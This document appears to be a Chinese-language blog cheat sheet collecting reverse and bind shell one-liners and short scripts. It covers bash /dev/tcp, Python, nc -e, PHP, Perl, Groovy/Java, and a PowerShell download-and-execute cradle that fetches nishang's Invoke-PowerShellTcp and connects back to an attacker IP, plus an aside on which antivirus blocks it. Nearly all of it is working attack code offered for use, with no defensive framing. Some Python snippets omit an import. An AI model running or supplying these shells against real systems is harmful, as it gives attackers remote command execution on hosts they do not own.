各種反彈shell的總結

linux自帶的bash反彈shell

在攻擊機行執行

nc -lvvp 12345 來監聽端口

在目標機上執行bash -i >& /dev/tcp/攻擊機IP/12345 0>&1



復雜一點的還可以用exec 5<>/dev/tcp/攻擊機地址/12345;cat <&5|while read line;do $line >&5 2>&1;done

Python反彈shell

攻擊機繼續監聽，目標機上執行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻擊機地址",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

這個暫時只是支持Linux

利用nc來反彈shell

當nc有-e選項參數的時候

使用nc ip地址 4444 -t -e /bin/bash

下面提一下正向的shell

郁離歌師傅寫的正向連接的shell(windows的)，

import subprocess
import os, threading

def send(talk, proc):
        import time
        while True:
                msg = proc.stdout.readline()
                talk.send(msg)

if __name__ == "__main__":
        server=socket(AF_INET,SOCK_STREAM)
        server.bind(('0.0.0.0',11))
        server.listen(5)
        print 'waiting for connect'
        talk, addr = server.accept()
        print 'connect from',addr
        proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE, 
                stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        t = threading.Thread(target = send, args = (talk, proc))
        t.setDaemon(True)
        t.start()
        while True:
                cmd=talk.recv(1024)
                proc.stdin.write(cmd)
                proc.stdin.flush()
        server.close()

Linux版的

import subprocess
import os, threading, sys, time

if __name__ == "__main__":
        server=socket(AF_INET,SOCK_STREAM)
        server.bind(('0.0.0.0',11))
        server.listen(5)
        print 'waiting for connect'
        talk, addr = server.accept()
        print 'connect from',addr
        proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
                stdout=talk, stderr=talk, shell=True)

php反彈shell

php -r '$sock=fsockopen("IP地址",4444);exec("/bin/sh -i <&3 >&3 2>&3");'


perl反彈shell

perl -e 'use Socket;$i="ip地址";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


java腳本反彈

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

Power反彈shell(360會攔截)

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444

這里是看了不少博客總結下來的，利用的方式肯定不止這幾種，以后再補充吧